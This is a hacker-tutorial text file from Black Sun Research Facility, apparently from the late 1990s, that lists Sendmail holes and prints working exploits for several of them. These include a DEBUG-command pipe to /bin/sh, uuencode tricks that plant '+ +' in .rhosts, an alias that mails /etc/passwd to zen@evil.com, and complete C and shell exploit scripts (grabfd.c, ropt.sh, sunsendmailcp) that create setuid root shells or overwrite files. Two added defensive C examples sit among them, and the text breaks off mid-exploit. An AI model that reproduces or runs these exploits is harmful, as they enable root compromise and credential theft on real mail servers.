########### # ### ######### ## #
############ ### ##### ### ##### ### ##
##### #### ##### ####### ### ### #### ###
##### ##### ####### ######### ### # #### ####
#### ##### ####### ########### ### ### ####
######### ####### #### #### ### #######
########### ##### ##### ##### ### ## #######
############# ### ## ###### ######### ### #### #########
###### #### # #### ######## ##### ## ###### ### ###
###### #### ########## #### #### ######### ### #####
##### #### ########## ### ### ####### #### ######
############# ########## ## ## ##### #### ####
########### ######## ## ## ### ### ##
####### # # # #
########## ## ## ## ##
### ### ## ## ### ###
### # ### ### ##### #### Black Sun Research Facility
### ## ## ###### #### http://blacksun.box.sk
### ## ## ####### #### ASCII By : cyRu5
# ### ### ### #### #######
### #### #### #### ### #####
########### ########### ## ###
######### ####### # #
_______________________________________________________________________
Various Sendmail Holes: By Ankit Fadia <ankit@bol.net.in>
_______________________________________________________________________
Sendmail, known as the buggiest daemon on earth, has a history of a large
number of bugs. In this text, I have made a list of known Sendmail holes.
Of course, the list is not complete, but it is an example of how many bugs
Sendmail has had over the years.
I also recommend that you read the Sendmail security tutorial at
http://blacksun.box.sk in order to get a better view of what exactly
Sendmail is.
-----------------------------------------------------------------------
Hole                                    Version of Sendmail
-----------------------------------------------------------------------
= WIZ = *oLD*
= DEBUG = *oLD*
= TURN = *oLD*
= OVERFLOW INPUT BUFFER = *oLD*
= DECODE ALIAS = *VrFy*
= qf SunOS = *SunOS-sendmailV5.1*
= -oR SunOS = *SunOS-sendmailV5.22*
= -oM = *8lgm6Dec1994-SMI-Sendmail(sm based on SunOS)*
= OVERWRITE FILES = *FiXED iN 5.59*
= -oQ = *DuNNo*
= |PROGRAM = *TeSTeD oN 5.55*
= .forward = *5.61*
= TAIL = *TeSTeD oN 5.65*
= -C = *oLD*
= 4.1 = *TeSTeD oN 4.1*
= -d########### = *8.X.X <8.6.7*
= -oE/filename bounce= *8.6.7*
= 8.6.9 ident = *8.6.9*
= 8.6.9 newlines = *8.6.9*
= 8.6.10 ident/newlines = *8.6.10*
= HP-UX = *HP-UX 9.x*
= 8.7.5 gecos = *8.X.X <8.8.0* *TeSTed oN 8.6.12*
= mime7to8() = *8.8.0*
= smtpd = *8.7-8.8.2*
= Local DOS = *Up to 8.9.3*
= Buggy HELO Command = *8.8.8*
= Giant Sendmail Bug = *8.8.4*
-----------------------------------------------------------------------
WIZ = *oLD* =
The oldest and easiest hole in sendmail is the 'wiz' backdoor, now very
difficult to find. At the connect just type 'wiz' and then 'SHELL', and
you're in a root shell. [ It can be set by configuring the sendmail.cf file:
the 'OW' option immediately followed by the encrypted password. ]
DEBUG = *oLD* =
This bug was used by the inet worm by Robert T. Morris Jr. Exploiting it
allows anyone to execute any program on a remote machine. It simply consists
of giving the 'debug' command, using a pipe to /bin/sh as the recipient and
feeding the data with the commands you want executed on the remote machine.
[ If the sendmail server answers "200 Debug set" to the 'debug' command,
there is a good chance the bug is still present. ]
Example :
#!/bin/sh
telnet << EOF
open fucked.host.edu 25
debug
mail from: </dev/null>
rcpt to: <\"|sed -e '1,/^$/'d | /bin/sh ; exit 0\">
data
cp /bin/sh /tmp/sushi # or alternatively:
chmod 4755 /tmp/sushi # echo "+ +" >> /.rhosts
.
EOF
TURN = *oLD* =
The TURN command allows mail to be stolen ... [ Don't bother, old stuff! ]
OVERFLOW INPUT BUFFER = *oLD* =
Causes the sendmail daemon to lock up ... [ Old stuff! Just for the
collection ;) ]
DECODE ALIAS = *VrFy* =
If '/etc/aliases' contains "|/usr/bin/uudecode", anyone who can send mail to
decode can write to any file owned by daemon, and anyone who can connect to
the sendmail daemon directly can write to any file owned by any user.
To test for the existence of the decode alias from a sendmail connection do:
% telnet target.com
Trying 127.127.127.127
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
1SecExploit:
% echo "myhost.com" | uuencode /usr/bin/.rhosts | mail decode@target.com
MoreThan1SecExploit:
% cat > outfile # Let's make our .rhosts file
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /bin/.rhosts
$*R'K"O\
% telnet fuqdhost.com 25
220 fuqdhost.com SunOS Sendmail 8.6.1 #5 ready at Fri, 13 May 99 00:00 (EST)
VRFY decode
250 <|/usr/bin/uudecode>
MAIL FROM: bin
250 ... Sender Okay
RCPT TO: decode
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
begin 644 /bin/.rhosts
$*R'K"O\ # which is just "+ +" uuencoded
end
.
250 Mail accepted
quit
221 fuqdhost.com closing connection
Connection closed by foreign host.
% rlogin fuqdhost.com -l bin
$
If no home directories are known or writable, an interesting variation of
this is to create a bogus /etc/aliases.pag file that contains an alias with
a command you wish to execute on your target. This may work since on many
systems the aliases.pag and aliases.dir files, which control the system's
mail aliases, are writable to the world.
evil % cat decode
bin: "| cat /etc/passwd | mail zen@evil.com"
evil % newaliases -oQ/tmp -oA`pwd`/decode
evil % uuencode decode.pag /etc/aliases.pag | mail decode@victim.com
evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null
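As an added defender-side check (not part of the original text), the following C program scans aliases text for entries that pipe into a program, which is exactly the condition the decode hole depends on; the aliases content is a constructed sample and the function names are my own:

```c
#include <string.h>

/* Constructed sample of /etc/aliases; "decode" is the entry the text warns about. */
static const char SAMPLE_ALIASES[] =
    "# Basic system aliases\n"
    "postmaster: root\n"
    "decode: \"|/usr/bin/uudecode\"\n"
    "nobody: /dev/null\n"
    "majordomo: \"|/usr/local/bin/majordomo\", owner-majordomo\n";

/* Nonzero if any comma-separated target on an alias right-hand side is a
 * program pipe, written as |cmd or "|cmd". */
int rhs_runs_program(const char *p)
{
    for (;;) {
        while (*p == ' ' || *p == '\t' || *p == '"') p++;  /* blanks, opening quote */
        if (*p == '|') return 1;
        while (*p && *p != ',') p++;                        /* skip to next target */
        if (*p == '\0') return 0;
        p++;
    }
}

/* Scan aliases text; names of aliases that expand to a program are appended
 * to out (comma separated). Returns how many were found. */
int find_program_aliases(const char *text, char *out, size_t outlen)
{
    int n = 0;
    out[0] = '\0';
    while (*text) {
        char line[512];
        const char *nl = strchr(text, '\n');
        size_t len = nl ? (size_t)(nl - text) : strlen(text);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, text, len);
        line[len] = '\0';
        char *colon = strchr(line, ':');
        if (line[0] != '#' && colon && rhs_runs_program(colon + 1)) {
            *colon = '\0';                                  /* keep only the name */
            if (n++ > 0) strncat(out, ",", outlen - strlen(out) - 1);
            strncat(out, line, outlen - strlen(out) - 1);
        }
        if (!nl) break;
        text = nl + 1;
    }
    return n;
}

char flagged[256];   /* result buffer for a stand-alone run */
```

Every name this reports should be justified and reviewed; the same audit is worth repeating on the aliases.pag/aliases.dir database files, whose world-writable permissions the text relies on for the second variation.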
qf SunOS = SunOS-sendmailV5.1 =
The method used by sendmail version 5 to open a control file
[/usr/spool/mqueue/qf########] is insecure. A race condition exists whereby
another process may obtain a control-file file descriptor opened for write
access. Sendmail v5, during execution, sets umask(0), which is an insecure
mask. In order not to leave control files with mode 666, sendmail v5 uses
chmod(2) to set a secure file mode. However, this is a race condition, as
an open file descriptor for write can be obtained by opening the control
file before the call to chmod(2).
IMPACT: Local users can write their own control files and run programs
as any user, bar root.
EXPLOIT:
grabfd.c:
/*
* grabfd.c
* usage: grabfd username command-file
*
* username: user to execute 'command-file' as.
* command-file: file containing 10 lines of shell commands to execute.
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/fcntl.h>
#include <sys/param.h>
#ifndef SENDMAIL
#define SENDMAIL "/usr/lib/sendmail"
#endif
#ifndef SPOOL_DIR
#define SPOOL_DIR "/usr/spool/mqueue"
#endif
char myqfile[] = "D%s\nC%s\nR|/usr/ucb/tail|/bin/sh\n";
main(argc,argv)
int argc;
char **argv;
{
int pid, fd;
char tbuf[MAXPATHLEN], sysbuf[BUFSIZ];
if (argc != 3) {
(void)fprintf(stderr, "%s: user file\n",
argv[0]);
exit(1);
}
if (getpwnam(argv[1]) == NULL)
(void)fprintf(stderr, "%s: user %s unknown (error ignored)\n",
argv[0],
argv[1]);
if (access(argv[2], F_OK) == -1) {
(void)fprintf(stderr, "%s: %s does not exist.\n",
argv[0],
argv[2]);
exit(1);
}
if (access(SPOOL_DIR, X_OK) == -1) {
(void)fprintf(stderr, "%s: cannot access %s.\n",
argv[0],
SPOOL_DIR);
exit(1);
}
if (pid=fork()) {
if (pid == -1) {
(void)perror("fork");
exit(1);
}
(void)sprintf(tbuf, "%s/tfAA%05d", SPOOL_DIR, pid);
(void)sprintf(sysbuf, myqfile, argv[2], argv[1]);
for (;;)
if ((fd=(open(tbuf, O_WRONLY, 0))) != -1) {
(void)printf("%s: grabbed queue fd.\n",
argv[0]);
(void)wait();
(void)ftruncate(fd, 0);
(void)write(fd, sysbuf, strlen(sysbuf));
(void)close(fd);
if(execl(SENDMAIL,
"sendmail", "-q", (char *)0) == -1) {
(void)perror("execl");
exit(1);
};
}
} else {
(void)close(0);
if (open("/etc/motd", O_RDONLY, 0) == -1) {
(void)perror("open");
exit(1);
};
if (execl(SENDMAIL,
"sendmail",
#ifdef sun
"-os",
#endif
"-odq", getlogin(), (char *)0) == -1) {
(void)perror("execl");
exit(1);
};
}
exit(1);
}
::::::::::::::::::::::::::::::::: END OF HOLE ::::::::::::::::::::::::::::
-oR SunOS = SunOS-4.1.X-sendmail V5.22 =
From 8lgm:
DESCRIPTION: The -oR option uses popen() to return undeliverable mail.
IMPACT: Local users can obtain root access.
-------------------------- ropt.sh ---------------------------------------
#!/bin/sh
#
# Syntax: roption host
#
# host is any system running sendmail (except localhost).
#
# This exploits a flaw in SunOS sendmail(8), and attempts
# create a suid root shell
#
# Written 1995 by [8LGM]
# Please do not use this script without permission.
#
PROG="`basename $0`"
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
# Check args
if [ $# -ne 1 ]; then
echo "Syntax: $PROG host"
exit 1
fi
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
PROG="`basename $0`"
EXECME=/tmp/HotterThanMojaveInMyHeart
# Create EXECME.c
cat > $EXECME.c << 'EOF'
main(argc,argv)
int argc;
char *argv[];
{
chown("/tmp/InfamousAngel", 0, 0);
chmod("/tmp/InfamousAngel", 04755);
}
EOF
cc -o $EXECME $EXECME.c
# Check we have EXECME
if [ ! -x $EXECME ]; then
echo "$PROG: couldnt compile $EXECME.c - check it out"
exit 1
fi
/bin/cp /bin/sh /tmp/InfamousAngel
# Run sendmail
/usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
To: No1InParticular
Hows it goin
EOF
exec /tmp/InfamousAngel
................................ Cut HeRe ...................................
-oM = 8lgm6Dec1994-SMI-Sendmail(based on SunOS sm) =
Sun sendmail allows -oM to set any macro and still retains root privilege.
( The list of 'trusted' macros should be limited. )
At the time of writing (Dec 1994) the affected sendmails were: " SunOS 4.x
Sendmail - all versions including the latest 4/5/94 Sendmail Jumbo Patch
100377-15 "
After further investigation, it has been discovered that SVR4-based ports
include a sendmail(8) based on SMI code.
EXPLOIT:
1. Create the file sunsendmailcp
8>------------------------- cut here ---------------------------
#!/bin/sh
#
# sunsendmailcp from to
if [ $# -ne 2 ]; then
echo usage: `basename $0` from to
exit 1
fi
rm -f /usr/tmp/dead.letter
if [ -f /usr/tmp/dead.letter ]; then
echo sorry, cant continue - /usr/tmp/dead.letter exists
fi
if [ ! -r $1 ]; then
echo $1 doesnt exist or is unreadable
exit 1
fi
ln -s $2 /usr/tmp/dead.letter
/usr/lib/sendmail -L0 '-oM#anything' $USER < $1
rm /usr/tmp/dead.letter
exit 0
8>------------------------- cut here ---------------------------
2. Execute the command % ./sunsendmailcp sourcefile targetfile and the
target file will either be appended to or created.
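The qf race above and this dead.letter symlink trick share one root cause: a privileged program creating or reusing a file at a path that other users can pre-arrange. The following is an added example, not sendmail code, showing the creation pattern that closes both windows (mode set at creation, never by a later chmod; a pre-existing file or symlink refused); the scratch directory and function names are my own:

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a brand-new control file. The 0600 mode is applied by the kernel at
 * creation, so there is never a moment when the file is 0666 (no chmod(2)
 * race), and O_EXCL|O_NOFOLLOW make the open fail instead of reusing or
 * following anything another user planted at that path beforehand. */
int create_control_file(const char *path)
{
    mode_t old = umask(077);          /* never run with umask(0) around the open */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    umask(old);
    return fd;                        /* -1, errno EEXIST, if the path already existed */
}

/* Self-check in a constructed scratch directory. Returns 0 when every property
 * holds: a fresh file is 0600, a second create of the same path is refused,
 * and a planted symlink (the /usr/tmp/dead.letter trick) is refused too. */
int check_create_control_file(void)
{
    char dir[64], path[96], lnk[96];
    struct stat st;
    int fd, rc = -1;
    snprintf(dir, sizeof dir, "/tmp/qfdemo.%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0) return -1;
    snprintf(path, sizeof path, "%s/qfAA00001", dir);
    snprintf(lnk, sizeof lnk, "%s/dead.letter", dir);

    fd = create_control_file(path);
    if (fd >= 0 && fstat(fd, &st) == 0 && (st.st_mode & 07777) == 0600 &&
        create_control_file(path) == -1 && errno == EEXIST &&
        symlink("/etc/passwd", lnk) == 0 &&      /* constructed hostile symlink */
        create_control_file(lnk) == -1)
        rc = 0;                                  /* all hardening checks passed */
    if (fd >= 0) close(fd);
    unlink(path); unlink(lnk); rmdir(dir);
    return rc;
}

int main(void)
{
    printf("hardened control-file creation: %s\n",
           check_create_control_file() == 0 ? "ok" : "FAILED");
    return 0;
}
```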
OVERWRITE FILES = FiXED iN 5.59 =
Remote users are able to write to any non-root-owned file on the system.
This bug was definitely fixed in version 5.59 from Berkeley. For versions of
sendmail previous to 5.59, "evil.com" gets appended to the file specified,
along with all of the typical mail headers, despite the error messages shown
below:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data